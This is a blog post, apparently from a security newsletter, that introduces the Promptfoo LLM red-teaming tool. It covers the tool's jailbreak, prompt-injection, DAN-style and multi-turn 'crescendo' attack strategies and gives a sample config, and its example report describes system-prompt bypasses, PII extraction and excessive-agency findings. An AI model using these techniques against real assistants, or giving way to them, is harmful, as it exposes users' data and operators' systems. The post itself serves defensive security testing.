<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[ToxSec - AI and Cybersecurity ]]></title><description><![CDATA[Security for a world run by machines that lie.]]></description><link>https://www.toxsec.com</link><generator>Substack</generator><lastBuildDate>Sun, 10 May 2026 10:56:48 GMT</lastBuildDate><atom:link href="https://www.toxsec.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Christopher Ijams]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[toxsec@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[toxsec@substack.com]]></itunes:email><itunes:name><![CDATA[ToxSec]]></itunes:name></itunes:owner><itunes:author><![CDATA[ToxSec]]></itunes:author><googleplay:owner><![CDATA[toxsec@substack.com]]></googleplay:owner><googleplay:email><![CDATA[toxsec@substack.com]]></googleplay:email><googleplay:author><![CDATA[ToxSec]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[Promptfoo Red Teaming: DAST for Your LLM Pipeline]]></title><description><![CDATA[YAML config, one command, 50+ attack plugins. OpenAI just bought the company. Still MIT licensed.]]></description><link>https://www.toxsec.com/p/promptfoo-red-teaming</link><guid isPermaLink="false">https://www.toxsec.com/p/promptfoo-red-teaming</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sat, 09 May 2026 13:31:22 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ZbyR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZbyR!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZbyR!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:7434020,&quot;alt&quot;:&quot;Promptfoo red teaming LLM vulnerability scanner tutorial showing YAML config attack plugins strategies and web UI results for AI security testing.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193714884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F13d24168-9e36-49e1-ae4f-efeb38afe030_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Promptfoo red teaming LLM vulnerability scanner tutorial showing YAML config attack plugins strategies and web UI results for AI security testing." title="Promptfoo red teaming LLM vulnerability scanner tutorial showing YAML config attack plugins strategies and web UI results for AI security testing." srcset="https://substackcdn.com/image/fetch/$s_!ZbyR!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!ZbyR!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F31fec9c4-6ffa-42f0-a867-288a0790c7ef_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> Promptfoo is an open-source CLI for evaluating and red teaming LLM apps. YAML config, 50+ attack plugins, built-in OWASP LLM Top 10 presets, and a web UI that shows exactly where your model broke. OpenAI acquired the company in March 2026, terms undisclosed. It stays MIT licensed and open source. One command generates hundreds of adversarial test cases and scores them automatically.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h3>Why Promptfoo Is the Red Team Tool Your Dev Team Will Actually Use</h3><p>Security tools that only security people run don&#8217;t stop bugs from shipping. They catch bugs after the damage is done. The tool that stops a vulnerable LLM from hitting production is the one that sits in the build pipeline and blocks the deploy.</p><p>Promptfoo is that tool. It&#8217;s a CLI and Node.js library for evaluating and red teaming LLM applications. YAML-configured, CI/CD-native, and designed for the developer workflow: define your target, pick your plugins, run the scan, read the web UI. The red team mode auto-generates adversarial prompts using 50+ attack plugins across prompt injection, jailbreaks, PII leakage, SSRF, SQL injection, excessive agency, hallucination, and more. It ships with OWASP LLM Top 10 presets, NIST AI RMF mappings, and MITRE ATLAS coverage. One line in your config enables an entire compliance framework&#8217;s worth of testing.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6ADY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6ADY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 424w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 848w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1272w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6ADY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png" width="985" height="652" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e9cc587f-556a-47de-a415-21c59a777a84_985x652.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:652,&quot;width&quot;:985,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:42670,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193714884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6ADY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 424w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 848w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1272w, https://substackcdn.com/image/fetch/$s_!6ADY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe9cc587f-556a-47de-a415-21c59a777a84_985x652.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The pedigree: 10.4k GitHub stars, 350,000+ developers, 130,000 active monthly users, and adoption at 25% of Fortune 500 companies. OpenAI and Anthropic both ran it internally before <a href="https://openai.com/index/openai-to-acquire-promptfoo/">OpenAI acquired the company on March 9, 2026</a>. Acquisition terms were undisclosed, though Promptfoo had been valued at $86 million at its July 2025 Series A. The repo stays open source under MIT and lives at github.com/promptfoo/promptfoo.</p><p>The difference between Promptfoo and the other tools in this space: your dev team will actually adopt it. YAML configs live in your repo. Results render in a browser. CI/CD integration means red teaming runs on every PR. No Python notebooks, no manual orchestration, no &#8220;let the security team handle it.&#8221; Security shifts left to where the code is written. <a href="https://www.toxsec.com/p/garak-llm-vulnerability-scanner">Garak gives us the broad CLI sweep across known probe families</a>. <a href="https://www.toxsec.com/p/pyrit-ai-red-teaming">PyRIT runs the surgical multi-turn follow-up</a>. Promptfoo is the one that sits in the pipeline and blocks the merge.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!qqvV!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!qqvV!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 424w, https://substackcdn.com/image/fetch/$s_!qqvV!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 848w, https://substackcdn.com/image/fetch/$s_!qqvV!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 1272w, https://substackcdn.com/image/fetch/$s_!qqvV!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!qqvV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png" width="2667" height="1170" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1170,&quot;width&quot;:2667,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:159260,&quot;alt&quot;:&quot;Toxsec.com - Promptfoo, Garak, or PyRIT.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193714884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F41ca6cb5-8bd3-45e2-acee-dce20f44d460_2667x1296.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Toxsec.com - Promptfoo, Garak, or PyRIT." title="Toxsec.com - Promptfoo, Garak, or PyRIT." srcset="https://substackcdn.com/image/fetch/$s_!qqvV!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 424w, https://substackcdn.com/image/fetch/$s_!qqvV!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 848w, https://substackcdn.com/image/fetch/$s_!qqvV!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 1272w, https://substackcdn.com/image/fetch/$s_!qqvV!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23a255f9-6130-4c43-b122-5176c0eed2ab_2667x1170.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>Plugins, Strategies, and the YAML That Runs It All</h3><p>Three concepts drive Promptfoo&#8217;s red team architecture.</p><p><strong>Plugins</strong> generate adversarial inputs targeting specific vulnerability classes. <code>harmful</code> generates prompts that attempt to elicit dangerous content. <code>jailbreak</code> tests guardrail bypass resistance. <code>hijacking</code> checks whether an attacker can redirect the model&#8217;s behavior. <code>pii:direct</code>, <code>pii:session</code>, and <code>pii:social</code> test for PII leakage through different vectors. <code>ssrf</code>, <code>sql-injection</code>, <code>shell-injection</code> test for the exact agent-level attacks that bounty programs pay for. Framework presets bundle related plugins: <code>owasp:llm</code> enables the full OWASP LLM Top 10 suite. <code>owasp:agentic</code> covers the newer OWASP Top 10 for AI Agents.</p><p><strong>Strategies</strong> determine how those adversarial inputs get delivered. <code>prompt-injection</code> wraps payloads in injection frames. <code>jailbreak</code> applies <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">DAN-style bypass techniques</a>. <code>crescendo</code> runs multi-turn escalation where each message builds on the last. These are the same attack patterns we&#8217;ve been stacking against guardrails manually, except Promptfoo automates the generation and delivery.</p><p>The YAML config ties everything together.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;yaml&quot;,&quot;nodeId&quot;:&quot;2d799992-66de-453d-97e7-b88a976b7b57&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-yaml"># promptfooconfig.yaml
targets:
  - id: openai:gpt-4o
    label: customer-service-bot

  # Or hit your own endpoint:
  - id: 'https://api.yourapp.com/chat'
    config:
      method: 'POST'
      headers:
        'Content-Type': 'application/json'
      body:
        message: '{{prompt}}'
      transformResponse: 'json.response'

redteam:
  purpose: &gt;
    Customer service chatbot for an airline.
    Users can check flight status, book tickets,
    and manage reservations.
  plugins:
    - owasp:llm          # Full OWASP LLM Top 10
    - harmful
    - pii
    - ssrf
    - excessive-agency
  strategies:
    - jailbreak
    - prompt-injection
    - crescendo</code></pre></div><p>That config scans your chatbot across every OWASP LLM Top 10 category, tests for PII exposure, checks for SSRF, and applies three different delivery strategies to each attack. The <code>purpose</code> field matters. Promptfoo uses it to generate contextually relevant adversarial prompts. An airline chatbot gets probes about frequent flyer data and booking system access. A healthcare app gets probes about patient records and HIPAA violations.</p><p>Run it:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;3ea5070e-9fe1-4a8a-9351-934aac1eef09&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">npm install -g promptfoo
promptfoo redteam init my-scan --no-gui
# Edit promptfooconfig.yaml with the config above
promptfoo redteam run</code></pre></div><p>Generation takes about five minutes. The scan runs every generated test case against your target, grades each response using an LLM judge, and renders the results in a web UI. Red means it broke. Green means it held. Click any finding to see the exact adversarial prompt, the model&#8217;s response, and the grader&#8217;s reasoning.</p><h3>The Promptfoo Report Card You Can&#8217;t Argue With</h3><p>Here&#8217;s what makes Promptfoo dangerous for complacent teams. The web UI generates a compliance report card. <a href="https://www.toxsec.com/p/owasp-top-10-for-genai">OWASP LLM Top 10</a>, NIST AI RMF, MITRE ATLAS. Each framework&#8217;s relevant controls mapped to your scan results. Green checkmarks where you passed. Red flags where you failed. Severity ratings. Evidence trails.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!VnCM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!VnCM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 424w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 848w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1272w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!VnCM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png" width="955" height="627" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:627,&quot;width&quot;:955,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:44747,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193714884?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!VnCM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 424w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 848w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1272w, https://substackcdn.com/image/fetch/$s_!VnCM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b436ed5-d46e-47ac-9fa9-6faf9c5edc5f_955x627.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Your chatbot just failed three OWASP categories across 23 individual test cases. The <code>prompt-injection</code> plugin found that jailbreak-wrapped requests bypass your system prompt 40% of the time. The <code>pii</code> plugin extracted customer email addresses through a social engineering frame. The <code>excessive-agency</code> plugin got the model to attempt API calls it shouldn&#8217;t have access to.</p><p>All documented. All reproducible. All sitting in a web dashboard your engineering manager can read without knowing what a jailbreak is. That&#8217;s the part that changes behavior. Security findings buried in JSONL 